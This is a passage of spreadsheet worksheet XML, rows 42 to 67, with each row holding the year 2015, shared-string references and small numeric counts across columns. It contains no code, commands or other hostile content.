        <v>6.0</v>
      </c>
      <c r="L42" s="27" t="s">
        <v>261</v>
      </c>
      <c r="M42" s="27">
        <v>3.0</v>
      </c>
      <c r="N42" s="27" t="s">
        <v>245</v>
      </c>
      <c r="O42" s="27">
        <v>5.0</v>
      </c>
      <c r="P42" s="12"/>
      <c r="Q42" s="12"/>
      <c r="R42" s="12"/>
      <c r="S42" s="12"/>
      <c r="T42" s="12"/>
      <c r="U42" s="12"/>
      <c r="V42" s="12"/>
      <c r="W42" s="12"/>
      <c r="X42" s="12"/>
      <c r="Y42" s="12"/>
      <c r="Z42" s="12"/>
      <c r="AA42" s="12"/>
      <c r="AB42" s="12"/>
      <c r="AC42" s="12"/>
    </row>
    <row r="43">
      <c r="A43" s="10">
        <v>2015.0</v>
      </c>
      <c r="B43" s="25" t="s">
        <v>262</v>
      </c>
      <c r="C43" s="27">
        <v>32.0</v>
      </c>
      <c r="D43" s="27" t="s">
        <v>247</v>
      </c>
      <c r="E43" s="27">
        <v>7.0</v>
      </c>
      <c r="F43" s="27" t="s">
        <v>263</v>
      </c>
      <c r="G43" s="27">
        <v>5.0</v>
      </c>
      <c r="H43" s="27" t="s">
        <v>249</v>
      </c>
      <c r="I43" s="27">
        <v>3.0</v>
      </c>
      <c r="J43" s="27" t="s">
        <v>255</v>
      </c>
      <c r="K43" s="27">
        <v>6.0</v>
      </c>
      <c r="L43" s="27" t="s">
        <v>251</v>
      </c>
      <c r="M43" s="27">
        <v>6.0</v>
      </c>
      <c r="N43" s="27" t="s">
        <v>266</v>
      </c>
      <c r="O43" s="27">
        <v>2.0</v>
      </c>
      <c r="P43" s="27" t="s">
        <v>245</v>
      </c>
      <c r="Q43" s="27">
        <v>3.0</v>
      </c>
      <c r="R43" s="12"/>
      <c r="S43" s="12"/>
      <c r="T43" s="12"/>
      <c r="U43" s="12"/>
      <c r="V43" s="12"/>
      <c r="W43" s="12"/>
      <c r="X43" s="12"/>
      <c r="Y43" s="12"/>
      <c r="Z43" s="12"/>
      <c r="AA43" s="12"/>
      <c r="AB43" s="12"/>
      <c r="AC43" s="12"/>
    </row>
    <row r="44">
      <c r="A44" s="10">
        <v>2015.0</v>
      </c>
      <c r="B44" s="25" t="s">
        <v>269</v>
      </c>
      <c r="C44" s="27">
        <v>33.0</v>
      </c>
      <c r="D44" s="27" t="s">
        <v>247</v>
      </c>
      <c r="E44" s="27">
        <v>6.0</v>
      </c>
      <c r="F44" s="27" t="s">
        <v>263</v>
      </c>
      <c r="G44" s="27">
        <v>7.0</v>
      </c>
      <c r="H44" s="27" t="s">
        <v>255</v>
      </c>
      <c r="I44" s="27">
        <v>5.0</v>
      </c>
      <c r="J44" s="27" t="s">
        <v>251</v>
      </c>
      <c r="K44" s="27">
        <v>6.0</v>
      </c>
      <c r="L44" s="27" t="s">
        <v>274</v>
      </c>
      <c r="M44" s="27">
        <v>2.0</v>
      </c>
      <c r="N44" s="27" t="s">
        <v>266</v>
      </c>
      <c r="O44" s="27">
        <v>4.0</v>
      </c>
      <c r="P44" s="27" t="s">
        <v>245</v>
      </c>
      <c r="Q44" s="27">
        <v>3.0</v>
      </c>
      <c r="R44" s="12"/>
      <c r="S44" s="12"/>
      <c r="T44" s="12"/>
      <c r="U44" s="12"/>
      <c r="V44" s="12"/>
      <c r="W44" s="12"/>
      <c r="X44" s="12"/>
      <c r="Y44" s="12"/>
      <c r="Z44" s="12"/>
      <c r="AA44" s="12"/>
      <c r="AB44" s="12"/>
      <c r="AC44" s="12"/>
    </row>
    <row r="45">
      <c r="A45" s="10">
        <v>2015.0</v>
      </c>
      <c r="B45" s="25" t="s">
        <v>275</v>
      </c>
      <c r="C45" s="27">
        <v>17.0</v>
      </c>
      <c r="D45" s="27" t="s">
        <v>276</v>
      </c>
      <c r="E45" s="27">
        <v>2.0</v>
      </c>
      <c r="F45" s="27" t="s">
        <v>247</v>
      </c>
      <c r="G45" s="27">
        <v>4.0</v>
      </c>
      <c r="H45" s="27" t="s">
        <v>248</v>
      </c>
      <c r="I45" s="27">
        <v>4.0</v>
      </c>
      <c r="J45" s="27" t="s">
        <v>249</v>
      </c>
      <c r="K45" s="27">
        <v>3.0</v>
      </c>
      <c r="L45" s="27" t="s">
        <v>245</v>
      </c>
      <c r="M45" s="27">
        <v>4.0</v>
      </c>
      <c r="N45" s="12"/>
      <c r="O45" s="12"/>
      <c r="P45" s="12"/>
      <c r="Q45" s="12"/>
      <c r="R45" s="12"/>
      <c r="S45" s="12"/>
      <c r="T45" s="12"/>
      <c r="U45" s="12"/>
      <c r="V45" s="12"/>
      <c r="W45" s="12"/>
      <c r="X45" s="12"/>
      <c r="Y45" s="12"/>
      <c r="Z45" s="12"/>
      <c r="AA45" s="12"/>
      <c r="AB45" s="12"/>
      <c r="AC45" s="12"/>
    </row>
    <row r="46">
      <c r="A46" s="10">
        <v>2015.0</v>
      </c>
      <c r="B46" s="25" t="s">
        <v>278</v>
      </c>
      <c r="C46" s="27">
        <v>15.0</v>
      </c>
      <c r="D46" s="27" t="s">
        <v>247</v>
      </c>
      <c r="E46" s="27">
        <v>4.0</v>
      </c>
      <c r="F46" s="27" t="s">
        <v>248</v>
      </c>
      <c r="G46" s="27">
        <v>4.0</v>
      </c>
      <c r="H46" s="27" t="s">
        <v>251</v>
      </c>
      <c r="I46" s="27">
        <v>4.0</v>
      </c>
      <c r="J46" s="27" t="s">
        <v>245</v>
      </c>
      <c r="K46" s="27">
        <v>3.0</v>
      </c>
      <c r="L46" s="12"/>
      <c r="M46" s="12"/>
      <c r="N46" s="12"/>
      <c r="O46" s="12"/>
      <c r="P46" s="12"/>
      <c r="Q46" s="12"/>
      <c r="R46" s="12"/>
      <c r="S46" s="12"/>
      <c r="T46" s="12"/>
      <c r="U46" s="12"/>
      <c r="V46" s="12"/>
      <c r="W46" s="12"/>
      <c r="X46" s="12"/>
      <c r="Y46" s="12"/>
      <c r="Z46" s="12"/>
      <c r="AA46" s="12"/>
      <c r="AB46" s="12"/>
      <c r="AC46" s="12"/>
    </row>
    <row r="47">
      <c r="A47" s="10">
        <v>2015.0</v>
      </c>
      <c r="B47" s="25" t="s">
        <v>279</v>
      </c>
      <c r="C47" s="27">
        <v>31.0</v>
      </c>
      <c r="D47" s="27" t="s">
        <v>247</v>
      </c>
      <c r="E47" s="27">
        <v>5.0</v>
      </c>
      <c r="F47" s="27" t="s">
        <v>281</v>
      </c>
      <c r="G47" s="27">
        <v>11.0</v>
      </c>
      <c r="H47" s="27" t="s">
        <v>256</v>
      </c>
      <c r="I47" s="27">
        <v>5.0</v>
      </c>
      <c r="J47" s="27" t="s">
        <v>283</v>
      </c>
      <c r="K47" s="27">
        <v>10.0</v>
      </c>
      <c r="L47" s="12"/>
      <c r="M47" s="12"/>
      <c r="N47" s="12"/>
      <c r="O47" s="12"/>
      <c r="P47" s="12"/>
      <c r="Q47" s="12"/>
      <c r="R47" s="12"/>
      <c r="S47" s="12"/>
      <c r="T47" s="12"/>
      <c r="U47" s="12"/>
      <c r="V47" s="12"/>
      <c r="W47" s="12"/>
      <c r="X47" s="12"/>
      <c r="Y47" s="12"/>
      <c r="Z47" s="12"/>
      <c r="AA47" s="12"/>
      <c r="AB47" s="12"/>
      <c r="AC47" s="12"/>
    </row>
    <row r="48">
      <c r="A48" s="10">
        <v>2015.0</v>
      </c>
      <c r="B48" s="25" t="s">
        <v>285</v>
      </c>
      <c r="C48" s="27">
        <v>11.0</v>
      </c>
      <c r="D48" s="27" t="s">
        <v>247</v>
      </c>
      <c r="E48" s="27">
        <v>2.0</v>
      </c>
      <c r="F48" s="27" t="s">
        <v>263</v>
      </c>
      <c r="G48" s="27">
        <v>5.0</v>
      </c>
      <c r="H48" s="27" t="s">
        <v>251</v>
      </c>
      <c r="I48" s="27">
        <v>4.0</v>
      </c>
      <c r="J48" s="12"/>
      <c r="K48" s="12"/>
      <c r="L48" s="12"/>
      <c r="M48" s="12"/>
      <c r="N48" s="12"/>
      <c r="O48" s="12"/>
      <c r="P48" s="12"/>
      <c r="Q48" s="12"/>
      <c r="R48" s="12"/>
      <c r="S48" s="12"/>
      <c r="T48" s="12"/>
      <c r="U48" s="12"/>
      <c r="V48" s="12"/>
      <c r="W48" s="12"/>
      <c r="X48" s="12"/>
      <c r="Y48" s="12"/>
      <c r="Z48" s="12"/>
      <c r="AA48" s="12"/>
      <c r="AB48" s="12"/>
      <c r="AC48" s="12"/>
    </row>
    <row r="49">
      <c r="A49" s="10">
        <v>2015.0</v>
      </c>
      <c r="B49" s="25" t="s">
        <v>286</v>
      </c>
      <c r="C49" s="27">
        <v>11.0</v>
      </c>
      <c r="D49" s="27" t="s">
        <v>247</v>
      </c>
      <c r="E49" s="27">
        <v>2.0</v>
      </c>
      <c r="F49" s="27" t="s">
        <v>263</v>
      </c>
      <c r="G49" s="27">
        <v>2.0</v>
      </c>
      <c r="H49" s="27" t="s">
        <v>287</v>
      </c>
      <c r="I49" s="27">
        <v>5.0</v>
      </c>
      <c r="J49" s="27" t="s">
        <v>288</v>
      </c>
      <c r="K49" s="27">
        <v>2.0</v>
      </c>
      <c r="L49" s="12"/>
      <c r="M49" s="12"/>
      <c r="N49" s="12"/>
      <c r="O49" s="12"/>
      <c r="P49" s="12"/>
      <c r="Q49" s="12"/>
      <c r="R49" s="12"/>
      <c r="S49" s="12"/>
      <c r="T49" s="12"/>
      <c r="U49" s="12"/>
      <c r="V49" s="12"/>
      <c r="W49" s="12"/>
      <c r="X49" s="12"/>
      <c r="Y49" s="12"/>
      <c r="Z49" s="12"/>
      <c r="AA49" s="12"/>
      <c r="AB49" s="12"/>
      <c r="AC49" s="12"/>
    </row>
    <row r="50">
      <c r="A50" s="10">
        <v>2015.0</v>
      </c>
      <c r="B50" s="25" t="s">
        <v>289</v>
      </c>
      <c r="C50" s="27">
        <v>15.0</v>
      </c>
      <c r="D50" s="27" t="s">
        <v>255</v>
      </c>
      <c r="E50" s="27">
        <v>8.0</v>
      </c>
      <c r="F50" s="27" t="s">
        <v>256</v>
      </c>
      <c r="G50" s="27">
        <v>4.0</v>
      </c>
      <c r="H50" s="27" t="s">
        <v>245</v>
      </c>
      <c r="I50" s="27">
        <v>3.0</v>
      </c>
      <c r="J50" s="12"/>
      <c r="K50" s="12"/>
      <c r="L50" s="12"/>
      <c r="M50" s="12"/>
      <c r="N50" s="12"/>
      <c r="O50" s="12"/>
      <c r="P50" s="12"/>
      <c r="Q50" s="12"/>
      <c r="R50" s="12"/>
      <c r="S50" s="12"/>
      <c r="T50" s="12"/>
      <c r="U50" s="12"/>
      <c r="V50" s="12"/>
      <c r="W50" s="12"/>
      <c r="X50" s="12"/>
      <c r="Y50" s="12"/>
      <c r="Z50" s="12"/>
      <c r="AA50" s="12"/>
      <c r="AB50" s="12"/>
      <c r="AC50" s="12"/>
    </row>
    <row r="51">
      <c r="A51" s="10">
        <v>2015.0</v>
      </c>
      <c r="B51" s="25" t="s">
        <v>292</v>
      </c>
      <c r="C51" s="27">
        <v>14.0</v>
      </c>
      <c r="D51" s="27" t="s">
        <v>294</v>
      </c>
      <c r="E51" s="27">
        <v>8.0</v>
      </c>
      <c r="F51" s="27" t="s">
        <v>256</v>
      </c>
      <c r="G51" s="27">
        <v>4.0</v>
      </c>
      <c r="H51" s="27" t="s">
        <v>245</v>
      </c>
      <c r="I51" s="27">
        <v>2.0</v>
      </c>
      <c r="J51" s="12"/>
      <c r="K51" s="12"/>
      <c r="L51" s="12"/>
      <c r="M51" s="12"/>
      <c r="N51" s="12"/>
      <c r="O51" s="12"/>
      <c r="P51" s="12"/>
      <c r="Q51" s="12"/>
      <c r="R51" s="12"/>
      <c r="S51" s="12"/>
      <c r="T51" s="12"/>
      <c r="U51" s="12"/>
      <c r="V51" s="12"/>
      <c r="W51" s="12"/>
      <c r="X51" s="12"/>
      <c r="Y51" s="12"/>
      <c r="Z51" s="12"/>
      <c r="AA51" s="12"/>
      <c r="AB51" s="12"/>
      <c r="AC51" s="12"/>
    </row>
    <row r="52">
      <c r="A52" s="10">
        <v>2015.0</v>
      </c>
      <c r="B52" s="25" t="s">
        <v>305</v>
      </c>
      <c r="C52" s="27">
        <v>4.0</v>
      </c>
      <c r="D52" s="27" t="s">
        <v>249</v>
      </c>
      <c r="E52" s="27">
        <v>2.0</v>
      </c>
      <c r="F52" s="27" t="s">
        <v>294</v>
      </c>
      <c r="G52" s="27">
        <v>2.0</v>
      </c>
      <c r="H52" s="12"/>
      <c r="I52" s="12"/>
      <c r="J52" s="12"/>
      <c r="K52" s="12"/>
      <c r="L52" s="12"/>
      <c r="M52" s="12"/>
      <c r="N52" s="12"/>
      <c r="O52" s="12"/>
      <c r="P52" s="12"/>
      <c r="Q52" s="12"/>
      <c r="R52" s="12"/>
      <c r="S52" s="12"/>
      <c r="T52" s="12"/>
      <c r="U52" s="12"/>
      <c r="V52" s="12"/>
      <c r="W52" s="12"/>
      <c r="X52" s="12"/>
      <c r="Y52" s="12"/>
      <c r="Z52" s="12"/>
      <c r="AA52" s="12"/>
      <c r="AB52" s="12"/>
      <c r="AC52" s="12"/>
    </row>
    <row r="53">
      <c r="A53" s="10">
        <v>2015.0</v>
      </c>
      <c r="B53" s="25" t="s">
        <v>307</v>
      </c>
      <c r="C53" s="27">
        <v>5.0</v>
      </c>
      <c r="D53" s="27" t="s">
        <v>247</v>
      </c>
      <c r="E53" s="27">
        <v>3.0</v>
      </c>
      <c r="F53" s="27" t="s">
        <v>281</v>
      </c>
      <c r="G53" s="27">
        <v>2.0</v>
      </c>
      <c r="H53" s="12"/>
      <c r="I53" s="12"/>
      <c r="J53" s="12"/>
      <c r="K53" s="12"/>
      <c r="L53" s="12"/>
      <c r="M53" s="12"/>
      <c r="N53" s="12"/>
      <c r="O53" s="12"/>
      <c r="P53" s="12"/>
      <c r="Q53" s="12"/>
      <c r="R53" s="12"/>
      <c r="S53" s="12"/>
      <c r="T53" s="12"/>
      <c r="U53" s="12"/>
      <c r="V53" s="12"/>
      <c r="W53" s="12"/>
      <c r="X53" s="12"/>
      <c r="Y53" s="12"/>
      <c r="Z53" s="12"/>
      <c r="AA53" s="12"/>
      <c r="AB53" s="12"/>
      <c r="AC53" s="12"/>
    </row>
    <row r="54">
      <c r="A54" s="10">
        <v>2015.0</v>
      </c>
      <c r="B54" s="25" t="s">
        <v>308</v>
      </c>
      <c r="C54" s="27">
        <v>35.0</v>
      </c>
      <c r="D54" s="27" t="s">
        <v>247</v>
      </c>
      <c r="E54" s="27">
        <v>6.0</v>
      </c>
      <c r="F54" s="27" t="s">
        <v>254</v>
      </c>
      <c r="G54" s="27">
        <v>6.0</v>
      </c>
      <c r="H54" s="27" t="s">
        <v>255</v>
      </c>
      <c r="I54" s="27">
        <v>6.0</v>
      </c>
      <c r="J54" s="27" t="s">
        <v>312</v>
      </c>
      <c r="K54" s="27">
        <v>3.0</v>
      </c>
      <c r="L54" s="27" t="s">
        <v>251</v>
      </c>
      <c r="M54" s="27">
        <v>3.0</v>
      </c>
      <c r="N54" s="27" t="s">
        <v>266</v>
      </c>
      <c r="O54" s="27">
        <v>6.0</v>
      </c>
      <c r="P54" s="27" t="s">
        <v>245</v>
      </c>
      <c r="Q54" s="27">
        <v>5.0</v>
      </c>
      <c r="R54" s="12"/>
      <c r="S54" s="12"/>
      <c r="T54" s="12"/>
      <c r="U54" s="12"/>
      <c r="V54" s="12"/>
      <c r="W54" s="12"/>
      <c r="X54" s="12"/>
      <c r="Y54" s="12"/>
      <c r="Z54" s="12"/>
      <c r="AA54" s="12"/>
      <c r="AB54" s="12"/>
      <c r="AC54" s="12"/>
    </row>
    <row r="55">
      <c r="A55" s="10">
        <v>2015.0</v>
      </c>
      <c r="B55" s="25" t="s">
        <v>318</v>
      </c>
      <c r="C55" s="27">
        <v>24.0</v>
      </c>
      <c r="D55" s="27" t="s">
        <v>247</v>
      </c>
      <c r="E55" s="27">
        <v>2.0</v>
      </c>
      <c r="F55" s="27" t="s">
        <v>248</v>
      </c>
      <c r="G55" s="27">
        <v>3.0</v>
      </c>
      <c r="H55" s="27" t="s">
        <v>254</v>
      </c>
      <c r="I55" s="27">
        <v>3.0</v>
      </c>
      <c r="J55" s="27" t="s">
        <v>325</v>
      </c>
      <c r="K55" s="27">
        <v>3.0</v>
      </c>
      <c r="L55" s="27" t="s">
        <v>255</v>
      </c>
      <c r="M55" s="27">
        <v>7.0</v>
      </c>
      <c r="N55" s="27" t="s">
        <v>256</v>
      </c>
      <c r="O55" s="27">
        <v>4.0</v>
      </c>
      <c r="P55" s="27" t="s">
        <v>245</v>
      </c>
      <c r="Q55" s="27">
        <v>2.0</v>
      </c>
      <c r="R55" s="12"/>
      <c r="S55" s="12"/>
      <c r="T55" s="12"/>
      <c r="U55" s="12"/>
      <c r="V55" s="12"/>
      <c r="W55" s="12"/>
      <c r="X55" s="12"/>
      <c r="Y55" s="12"/>
      <c r="Z55" s="12"/>
      <c r="AA55" s="12"/>
      <c r="AB55" s="12"/>
      <c r="AC55" s="12"/>
    </row>
    <row r="56">
      <c r="A56" s="10">
        <v>2015.0</v>
      </c>
      <c r="B56" s="25" t="s">
        <v>331</v>
      </c>
      <c r="C56" s="27">
        <v>34.0</v>
      </c>
      <c r="D56" s="27" t="s">
        <v>247</v>
      </c>
      <c r="E56" s="27">
        <v>3.0</v>
      </c>
      <c r="F56" s="27" t="s">
        <v>254</v>
      </c>
      <c r="G56" s="27">
        <v>5.0</v>
      </c>
      <c r="H56" s="27" t="s">
        <v>332</v>
      </c>
      <c r="I56" s="27">
        <v>14.0</v>
      </c>
      <c r="J56" s="27" t="s">
        <v>333</v>
      </c>
      <c r="K56" s="27">
        <v>2.0</v>
      </c>
      <c r="L56" s="27" t="s">
        <v>267</v>
      </c>
      <c r="M56" s="27">
        <v>2.0</v>
      </c>
      <c r="N56" s="27" t="s">
        <v>251</v>
      </c>
      <c r="O56" s="27">
        <v>2.0</v>
      </c>
      <c r="P56" s="27" t="s">
        <v>336</v>
      </c>
      <c r="Q56" s="27">
        <v>3.0</v>
      </c>
      <c r="R56" s="27" t="s">
        <v>339</v>
      </c>
      <c r="S56" s="27">
        <v>3.0</v>
      </c>
      <c r="T56" s="12"/>
      <c r="U56" s="12"/>
      <c r="V56" s="12"/>
      <c r="W56" s="12"/>
      <c r="X56" s="12"/>
      <c r="Y56" s="12"/>
      <c r="Z56" s="12"/>
      <c r="AA56" s="12"/>
      <c r="AB56" s="12"/>
      <c r="AC56" s="12"/>
    </row>
    <row r="57">
      <c r="A57" s="10">
        <v>2015.0</v>
      </c>
      <c r="B57" s="25" t="s">
        <v>345</v>
      </c>
      <c r="C57" s="27">
        <v>20.0</v>
      </c>
      <c r="D57" s="27" t="s">
        <v>247</v>
      </c>
      <c r="E57" s="27">
        <v>4.0</v>
      </c>
      <c r="F57" s="27" t="s">
        <v>248</v>
      </c>
      <c r="G57" s="27">
        <v>4.0</v>
      </c>
      <c r="H57" s="27" t="s">
        <v>249</v>
      </c>
      <c r="I57" s="27">
        <v>4.0</v>
      </c>
      <c r="J57" s="27" t="s">
        <v>251</v>
      </c>
      <c r="K57" s="27">
        <v>4.0</v>
      </c>
      <c r="L57" s="27" t="s">
        <v>245</v>
      </c>
      <c r="M57" s="27">
        <v>4.0</v>
      </c>
      <c r="N57" s="12"/>
      <c r="O57" s="12"/>
      <c r="P57" s="12"/>
      <c r="Q57" s="12"/>
      <c r="R57" s="12"/>
      <c r="S57" s="12"/>
      <c r="T57" s="12"/>
      <c r="U57" s="12"/>
      <c r="V57" s="12"/>
      <c r="W57" s="12"/>
      <c r="X57" s="12"/>
      <c r="Y57" s="12"/>
      <c r="Z57" s="12"/>
      <c r="AA57" s="12"/>
      <c r="AB57" s="12"/>
      <c r="AC57" s="12"/>
    </row>
    <row r="58">
      <c r="A58" s="10">
        <v>2015.0</v>
      </c>
      <c r="B58" s="38" t="s">
        <v>349</v>
      </c>
      <c r="C58" s="27">
        <v>22.0</v>
      </c>
      <c r="D58" s="27" t="s">
        <v>354</v>
      </c>
      <c r="E58" s="27">
        <v>4.0</v>
      </c>
      <c r="F58" s="27" t="s">
        <v>249</v>
      </c>
      <c r="G58" s="27">
        <v>2.0</v>
      </c>
      <c r="H58" s="27" t="s">
        <v>294</v>
      </c>
      <c r="I58" s="27">
        <v>10.0</v>
      </c>
      <c r="J58" s="27" t="s">
        <v>251</v>
      </c>
      <c r="K58" s="27">
        <v>6.0</v>
      </c>
      <c r="L58" s="12"/>
      <c r="M58" s="12"/>
      <c r="N58" s="12"/>
      <c r="O58" s="12"/>
      <c r="P58" s="12"/>
      <c r="Q58" s="12"/>
      <c r="R58" s="12"/>
      <c r="S58" s="12"/>
      <c r="T58" s="12"/>
      <c r="U58" s="12"/>
      <c r="V58" s="12"/>
      <c r="W58" s="12"/>
      <c r="X58" s="12"/>
      <c r="Y58" s="12"/>
      <c r="Z58" s="12"/>
      <c r="AA58" s="12"/>
      <c r="AB58" s="12"/>
      <c r="AC58" s="12"/>
    </row>
    <row r="59">
      <c r="A59" s="10">
        <v>2015.0</v>
      </c>
      <c r="B59" s="25" t="s">
        <v>358</v>
      </c>
      <c r="C59" s="27">
        <v>64.0</v>
      </c>
      <c r="D59" s="27" t="s">
        <v>276</v>
      </c>
      <c r="E59" s="27">
        <v>3.0</v>
      </c>
      <c r="F59" s="27" t="s">
        <v>247</v>
      </c>
      <c r="G59" s="27">
        <v>17.0</v>
      </c>
      <c r="H59" s="27" t="s">
        <v>254</v>
      </c>
      <c r="I59" s="27">
        <v>13.0</v>
      </c>
      <c r="J59" s="27" t="s">
        <v>361</v>
      </c>
      <c r="K59" s="27">
        <v>5.0</v>
      </c>
      <c r="L59" s="27" t="s">
        <v>363</v>
      </c>
      <c r="M59" s="27">
        <v>14.0</v>
      </c>
      <c r="N59" s="27" t="s">
        <v>245</v>
      </c>
      <c r="O59" s="27">
        <v>12.0</v>
      </c>
      <c r="P59" s="12"/>
      <c r="Q59" s="12"/>
      <c r="R59" s="12"/>
      <c r="S59" s="12"/>
      <c r="T59" s="12"/>
      <c r="U59" s="12"/>
      <c r="V59" s="12"/>
      <c r="W59" s="12"/>
      <c r="X59" s="12"/>
      <c r="Y59" s="12"/>
      <c r="Z59" s="12"/>
      <c r="AA59" s="12"/>
      <c r="AB59" s="12"/>
      <c r="AC59" s="12"/>
    </row>
    <row r="60">
      <c r="A60" s="10">
        <v>2015.0</v>
      </c>
      <c r="B60" s="38" t="s">
        <v>366</v>
      </c>
      <c r="C60" s="38">
        <v>30.0</v>
      </c>
      <c r="D60" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E60" s="38">
        <v>5.0</v>
      </c>
      <c r="F60" s="38" t="s">
        <v>249</v>
      </c>
      <c r="G60" s="38">
        <v>5.0</v>
      </c>
      <c r="H60" s="38" t="s">
        <v>255</v>
      </c>
      <c r="I60" s="38">
        <v>4.0</v>
      </c>
      <c r="J60" s="38" t="s">
        <v>251</v>
      </c>
      <c r="K60" s="38">
        <v>6.0</v>
      </c>
      <c r="L60" s="38" t="s">
        <v>266</v>
      </c>
      <c r="M60" s="38">
        <v>5.0</v>
      </c>
      <c r="N60" s="38" t="s">
        <v>245</v>
      </c>
      <c r="O60" s="38">
        <v>5.0</v>
      </c>
      <c r="P60" s="12"/>
      <c r="Q60" s="12"/>
      <c r="R60" s="12"/>
      <c r="S60" s="12"/>
      <c r="T60" s="12"/>
      <c r="U60" s="12"/>
      <c r="V60" s="12"/>
      <c r="W60" s="12"/>
      <c r="X60" s="12"/>
      <c r="Y60" s="12"/>
      <c r="Z60" s="12"/>
      <c r="AA60" s="12"/>
      <c r="AB60" s="12"/>
      <c r="AC60" s="12"/>
    </row>
    <row r="61">
      <c r="A61" s="10">
        <v>2015.0</v>
      </c>
      <c r="B61" s="38" t="s">
        <v>370</v>
      </c>
      <c r="C61" s="38">
        <v>20.0</v>
      </c>
      <c r="D61" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E61" s="38">
        <v>4.0</v>
      </c>
      <c r="F61" s="38" t="s">
        <v>249</v>
      </c>
      <c r="G61" s="38">
        <v>4.0</v>
      </c>
      <c r="H61" s="38" t="s">
        <v>255</v>
      </c>
      <c r="I61" s="38">
        <v>4.0</v>
      </c>
      <c r="J61" s="38" t="s">
        <v>251</v>
      </c>
      <c r="K61" s="38">
        <v>4.0</v>
      </c>
      <c r="L61" s="38" t="s">
        <v>245</v>
      </c>
      <c r="M61" s="38">
        <v>4.0</v>
      </c>
      <c r="N61" s="12"/>
      <c r="O61" s="12"/>
      <c r="P61" s="12"/>
      <c r="Q61" s="12"/>
      <c r="R61" s="12"/>
      <c r="S61" s="12"/>
      <c r="T61" s="12"/>
      <c r="U61" s="12"/>
      <c r="V61" s="12"/>
      <c r="W61" s="12"/>
      <c r="X61" s="12"/>
      <c r="Y61" s="12"/>
      <c r="Z61" s="12"/>
      <c r="AA61" s="12"/>
      <c r="AB61" s="12"/>
      <c r="AC61" s="12"/>
    </row>
    <row r="62">
      <c r="A62" s="10">
        <v>2015.0</v>
      </c>
      <c r="B62" s="38" t="s">
        <v>374</v>
      </c>
      <c r="C62" s="38" t="s">
        <v>375</v>
      </c>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row>
    <row r="63">
      <c r="A63" s="10">
        <v>2015.0</v>
      </c>
      <c r="B63" s="38" t="s">
        <v>377</v>
      </c>
      <c r="C63" s="38" t="s">
        <v>378</v>
      </c>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row>
    <row r="64">
      <c r="A64" s="10">
        <v>2015.0</v>
      </c>
      <c r="B64" s="38" t="s">
        <v>382</v>
      </c>
      <c r="C64" s="38">
        <v>22.0</v>
      </c>
      <c r="D64" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E64" s="38">
        <v>4.0</v>
      </c>
      <c r="F64" s="38" t="s">
        <v>263</v>
      </c>
      <c r="G64" s="38">
        <v>4.0</v>
      </c>
      <c r="H64" s="38" t="s">
        <v>363</v>
      </c>
      <c r="I64" s="38">
        <v>1.0</v>
      </c>
      <c r="J64" s="38" t="s">
        <v>255</v>
      </c>
      <c r="K64" s="38">
        <v>7.0</v>
      </c>
      <c r="L64" s="38" t="s">
        <v>294</v>
      </c>
      <c r="M64" s="38">
        <v>3.0</v>
      </c>
      <c r="N64" s="38" t="s">
        <v>251</v>
      </c>
      <c r="O64" s="38">
        <v>1.0</v>
      </c>
      <c r="P64" s="38" t="s">
        <v>266</v>
      </c>
      <c r="Q64" s="38">
        <v>1.0</v>
      </c>
      <c r="R64" s="38" t="s">
        <v>245</v>
      </c>
      <c r="S64" s="38">
        <v>1.0</v>
      </c>
      <c r="T64" s="12"/>
      <c r="U64" s="12"/>
      <c r="V64" s="12"/>
      <c r="W64" s="12"/>
      <c r="X64" s="12"/>
      <c r="Y64" s="12"/>
      <c r="Z64" s="12"/>
      <c r="AA64" s="12"/>
      <c r="AB64" s="12"/>
      <c r="AC64" s="12"/>
    </row>
    <row r="65">
      <c r="A65" s="10">
        <v>2015.0</v>
      </c>
      <c r="B65" s="38" t="s">
        <v>387</v>
      </c>
      <c r="C65" s="38">
        <v>21.0</v>
      </c>
      <c r="D65" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E65" s="38">
        <v>4.0</v>
      </c>
      <c r="F65" s="38" t="s">
        <v>388</v>
      </c>
      <c r="G65" s="38">
        <v>3.0</v>
      </c>
      <c r="H65" s="38" t="s">
        <v>254</v>
      </c>
      <c r="I65" s="38">
        <v>3.0</v>
      </c>
      <c r="J65" s="38" t="s">
        <v>251</v>
      </c>
      <c r="K65" s="38">
        <v>4.0</v>
      </c>
      <c r="L65" s="38" t="s">
        <v>274</v>
      </c>
      <c r="M65" s="38">
        <v>1.0</v>
      </c>
      <c r="N65" s="38" t="s">
        <v>245</v>
      </c>
      <c r="O65" s="38">
        <v>6.0</v>
      </c>
      <c r="P65" s="12"/>
      <c r="Q65" s="12"/>
      <c r="R65" s="12"/>
      <c r="S65" s="12"/>
      <c r="T65" s="12"/>
      <c r="U65" s="12"/>
      <c r="V65" s="12"/>
      <c r="W65" s="12"/>
      <c r="X65" s="12"/>
      <c r="Y65" s="12"/>
      <c r="Z65" s="12"/>
      <c r="AA65" s="12"/>
      <c r="AB65" s="12"/>
      <c r="AC65" s="12"/>
    </row>
    <row r="66">
      <c r="A66" s="10">
        <v>2015.0</v>
      </c>
      <c r="B66" s="38" t="s">
        <v>391</v>
      </c>
      <c r="C66" s="38">
        <v>24.0</v>
      </c>
      <c r="D66" s="38" t="s">
        <v>393</v>
      </c>
      <c r="E66" s="38">
        <v>4.0</v>
      </c>
      <c r="F66" s="38" t="s">
        <v>247</v>
      </c>
      <c r="G66" s="38">
        <v>5.0</v>
      </c>
      <c r="H66" s="38" t="s">
        <v>394</v>
      </c>
      <c r="I66" s="38">
        <v>5.0</v>
      </c>
      <c r="J66" s="38" t="s">
        <v>254</v>
      </c>
      <c r="K66" s="38">
        <v>1.0</v>
      </c>
      <c r="L66" s="38" t="s">
        <v>251</v>
      </c>
      <c r="M66" s="38">
        <v>3.0</v>
      </c>
      <c r="N66" s="38" t="s">
        <v>245</v>
      </c>
      <c r="O66" s="38">
        <v>6.0</v>
      </c>
      <c r="P66" s="12"/>
      <c r="Q66" s="12"/>
      <c r="R66" s="12"/>
      <c r="S66" s="12"/>
      <c r="T66" s="12"/>
      <c r="U66" s="12"/>
      <c r="V66" s="12"/>
      <c r="W66" s="12"/>
      <c r="X66" s="12"/>
      <c r="Y66" s="12"/>
      <c r="Z66" s="12"/>
      <c r="AA66" s="12"/>
      <c r="AB66" s="12"/>
      <c r="AC66" s="12"/>
    </row>
    <row r="67">
      <c r="A67" s="10">
        <v>2015.0</v>
      </c>
      <c r="B67" s="38" t="s">
        <v>397</v>
      </c>
      <c r="C67" s="38">
        <v>12.0</v>
      </c>
